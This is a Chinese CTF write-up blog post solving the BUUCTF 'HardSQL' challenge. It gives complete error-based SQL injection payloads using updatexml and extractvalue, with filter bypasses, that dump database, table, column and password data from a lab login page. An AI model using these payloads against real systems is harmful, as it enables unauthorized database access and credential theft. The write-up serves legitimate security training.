web:[极客大挑战 2019]HardSQL

sleepywin2023-10-20 18:52

题目

打开页面显示为

查看源代码没有发现其他的提示信息,随便尝试一下

错误

题目名为hardsql,先来尝试有无sql注入存在

尝试输入单引号输入

显示页面存在注入

这里按照常规思路继续使用order by函数和union select函数进行查询,但是页面没有任何显示

上述测试闭合时返回了错误信息,用bp抓包,看一下过滤的,发现用于报错的注入函数没有被过滤

使用updatexml

通过查询可知,updatexml在执行时,第二个参数应该为合法的xpath路径,否则会引发报错的同时将传入的参数进行输出

先查询数据库,构造payload

复制代码 
http://7e5d1a53-23d2-4466-a553-66a204aaac29.node4.buuoj.cn:81/check.php?username=admin%27or(updatexml(1,concat(0x7e,database(),0x7e),1))%23&password=123

可得知数据库名为geek

查询表,构造payload

复制代码 
http://7e5d1a53-23d2-4466-a553-66a204aaac29.node4.buuoj.cn:81/check.php?username=admin%27or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1))%23&password=123

得到表

查字段,构造payload

复制代码 
http://7e5d1a53-23d2-4466-a553-66a204aaac29.node4.buuoj.cn:81/check.php?username=admin%27or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_schema)like(database())),0x7e),1))%23&password=123

可以得到字段名

然后查询想要的字段

构造payload

复制代码 
http://7e5d1a53-23d2-4466-a553-66a204aaac29.node4.buuoj.cn:81/check.php?username=admin%27or(updatexml(1,concat(0x7e,(select(group_concat(id,username,password))from(H4rDsq1)),0x7e),1))%23&password=123

发现flag显示不全,函数显示有字符数限制

使用right可得到另一半

构造payload

复制代码 
http://7e5d1a53-23d2-4466-a553-66a204aaac29.node4.buuoj.cn:81/check.php?username=admin%27or(updatexml(1,concat(0x7e,(select(group_concat((right(password,25))))from(H4rDsq1)),0x7e),1))%23&password=123
使用extractvalue()

这里空格和=没有,使用()代替空格,使用like代替=

查数据库

构造payload

复制代码 
/check.php?username=admin&password=123'^extractvalue(1,concat(0x7e,(select(database()))))%23

查表

构造payload

复制代码 
/check.php?username=admin&password=123'^extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where((table_schema)like('geek')))))%23

查字段

构造payload

复制代码 
/check.php?username=admin&password=123'^extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where((table_name)like('H4rDsq1')))))%23

查数据

复制代码 
/check.php?username=admin&password=123'^extractvalue(1,concat(0x7e,(select(password)from(geek.H4rDsq1))))%23

这里也是显示不全,按照上面的updatexml后的方法进行补全即可

参考文章链接:

buuctf-[极客大挑战 2019]HardSQL(小宇特详解)_小宇特详解的博客-CSDN博客

https://www.cnblogs.com/GTL-JU/p/16042242.html

https://www.cnblogs.com/upfine/p/16578800.html

相关推荐
Web极客码28 分钟前
如何轻松、安全地管理密码(新手指南)
计算机网络·安全·web安全·网络安全
神奇侠20242 小时前
Hive SQL常见操作
hive·hadoop·sql
一只叫煤球的猫2 小时前
MySQL 8.0 SQL优化黑科技,面试官都不一定知道!
后端·sql·mysql
寒山李白2 小时前
MySQL安装与配置详细讲解
数据库·mysql·配置安装
多多*2 小时前
微服务网关SpringCloudGateway+SaToken鉴权
linux·开发语言·redis·python·sql·log4j·bootstrap
文牧之3 小时前
PostgreSQL 的扩展pg_freespacemap
运维·数据库·postgresql
deriva3 小时前
某水表量每15分钟一报,然后某天示数清0了,重新报示值了 ,如何写sql 计算每日水量
数据库·sql
Leo.yuan4 小时前
数据库同步是什么意思?数据库架构有哪些?
大数据·数据库·oracle·数据分析·数据库架构
Kookoos4 小时前
ABP VNext 与 Neo4j:构建基于图数据库的高效关系查询
数据库·c#·.net·neo4j·abp vnext
云之兕5 小时前
MyBatis 的动态 SQL
数据库·sql·mybatis
热门推荐
01【无人机】无人机通信模块,无人机图数传模块的介绍,数传,图传,图传数传一体电台,02KGG转MP3工具|非KGM文件|解密音频03YOLOv8入门 | 重要性能衡量指标、训练结果评价及分析及影响mAP的因素【发论文关注的指标】04神经网络架构KAN确实具有一些独特的特点及底层原理和应用场景05从零安装 LLaMA-Factory 微调 Qwen 大模型成功及所有的坑06【SpeedAI科研小助手】2分钟极速解决知网维普重复率、AIGC率过高,一键全文降!文件格式不变,公式都保留的!07柬埔寨语翻译通App,一款真正实现高棉语翻译、语音识别和中柬双语无障碍交流的应用程序。08DeepSeek各版本说明与优缺点分析09组基轨迹建模 GBTM的介绍与实现(Stata 或 R)10海康Visionmaster-常见问题排查方法-启动阶段